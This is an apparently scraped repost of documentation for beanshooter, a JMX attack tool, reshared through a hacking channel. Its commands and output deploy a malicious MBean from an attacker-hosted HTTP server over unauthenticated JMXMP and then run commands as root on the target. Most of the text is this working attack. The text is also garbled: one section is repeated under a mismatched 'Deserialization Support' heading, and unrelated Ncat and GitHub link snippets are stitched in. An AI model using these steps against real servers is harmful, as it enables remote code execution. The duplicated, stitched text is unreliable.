[+] Redirecting the connection back to 172.17.0.2... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Unregister malicious bean... done!
[+] Unregister MBean 'MLet'... done! Now the JMX endpoint should be clean again and MLet and the malicious MBean should be removed.
JMXMP Support
___________________________
@hacking_Attack
@Hacking_Video
nmap.org
Ncat - Netcat for the 21st Century
Ncat is a free, open-source Netcat replacement for Linux, Windows, OS X and more. TLS/SSL encryption, proxy support, IPv6, Lua scripting.
JMXMP (JMX Messaging Protocol) is just an alternate way (alternate connector) to access a JMX agent and differs in some points from the Java RMI based access as described above. However, for the purpose of this tool, these differences do not really matter. The important thing is that also the JMXMP connector can allow unauthenticated connections and it is also possible to use the MLet MBean over this connector. The required classes for the JMXMP connector can be found inside a .jar file called jmxremote_optional.jar. Unfortunately, this .jar does not has its own project on Maven anymore (it seems like it was an artifact of the JMX project once, but was removed for some reason). Now, it can be loaded as an artifact of other projects. beanshooter supports the JMXMP protocol by using the jmxremote-optional artifact from org.glassfish.external. In order to test JMXMP support, the provided docker-image (https://github.com/qtc-de/beanshooter/packages/398561) also opens multiple JMXMP listener on the ports 5555 to 5560. The following listing shows just the same examples as above, but this time using the JMXMP protocol: [qtc@kali ~]$ beanshooter --jmxmp --stager-host 172.17.0.1 --stager-port 8080 172.17.0.2 5555 deployAll
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Creating MBean 'MLet' for remote deploymet... done!
[+] MBean 'MLet' did already exist.
[+]
[+] Malicious Bean seems not to be registered on the server
[+] Starting registration process
[+] Creating HTTP server on 172.17.0.1:8080
[+] Creating MLetHandler for endpoint /mlet... done!
[+] Creating JarHandler for endpoint /tonka-bean.jar... done!
[+] Starting the HTTP server... done!
[+]
[+] Received request for /mlet
[+] Sending malicious mlet:
[+]
[+] Class: de.qtc.tonkabean.TonkaBean
[+] Archive: tonka-bean.jar
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8080
[+]
[+] Received request for /tonka-bean.jar
[+] Sending malicious jar file... d one!
[+]
[+] malicious Bean was successfully registered
[qtc@kali ~]$ beanshooter --jmxmp 172.17.0.2 5555 execute id
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Sending command 'id' to the server...
[+] Servers answer is: uid=0(root) gid=0(root) groups=0(root) Apart from the plain JMXMP listener on port 5555, the other JMXMP listeners implement different kind of protections: Port 5556 - SSL protected JMXMP Port 5557 - TLS SASL/PLAIN protected JMXMP Port 5558 - TLS SASL/CRAM-MD5 protected JMXMP Port 5559 - TLS SASL/DIGEST-MD5 protected JMXMP Port 5560 - TLS SASL/NTLM protected JMXMP Beanshooter supports all these types of protections and corresponding examples can be found inside the README.md of the docker-container (https://github.com/qtc-de/beanshooter/blob/master/.docker). Useful tip: It is also possible to use jconsole to connect to a running JMX agent via JMXMP. Instead of simply specifying the host and port number for the connection, you have to use the JMXMP service URI service:jmx:jmxmp://: and you have to make sure that the jmxremote_optional.jar is inside your classpath.
Deserialization Support
___________________________
@hacking_Attack
@Hacking_Video
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Creating MBean 'MLet' for remote deploymet... done!
[+] MBean 'MLet' did already exist.
[+]
[+] Malicious Bean seems not to be registered on the server
[+] Starting registration process
[+] Creating HTTP server on 172.17.0.1:8080
[+] Creating MLetHandler for endpoint /mlet... done!
[+] Creating JarHandler for endpoint /tonka-bean.jar... done!
[+] Starting the HTTP server... done!
[+]
[+] Received request for /mlet
[+] Sending malicious mlet:
[+]
[+] Class: de.qtc.tonkabean.TonkaBean
[+] Archive: tonka-bean.jar
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: http://172.17.0.1:8080
[+]
[+] Received request for /tonka-bean.jar
[+] Sending malicious jar file... d one!
[+]
[+] malicious Bean was successfully registered
[qtc@kali ~]$ beanshooter --jmxmp 172.17.0.2 5555 execute id
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+]
[+] Sending command 'id' to the server...
[+] Servers answer is: uid=0(root) gid=0(root) groups=0(root) Apart from the plain JMXMP listener on port 5555, the other JMXMP listeners implement different kind of protections: Port 5556 - SSL protected JMXMP Port 5557 - TLS SASL/PLAIN protected JMXMP Port 5558 - TLS SASL/CRAM-MD5 protected JMXMP Port 5559 - TLS SASL/DIGEST-MD5 protected JMXMP Port 5560 - TLS SASL/NTLM protected JMXMP Beanshooter supports all these types of protections and corresponding examples can be found inside the README.md of the docker-container (https://github.com/qtc-de/beanshooter/blob/master/.docker). Useful tip: It is also possible to use jconsole to connect to a running JMX agent via JMXMP. Instead of simply specifying the host and port number for the connection, you have to use the JMXMP service URI service:jmx:jmxmp://: and you have to make sure that the jmxremote_optional.jar is inside your classpath.
Deserialization Support
___________________________
@hacking_Attack
@Hacking_Video
GitHub
Package tomcat8-jmxmp · qtc-de/beanshooter
JMX enumeration and attacking tool. Contribute to qtc-de/beanshooter development by creating an account on GitHub.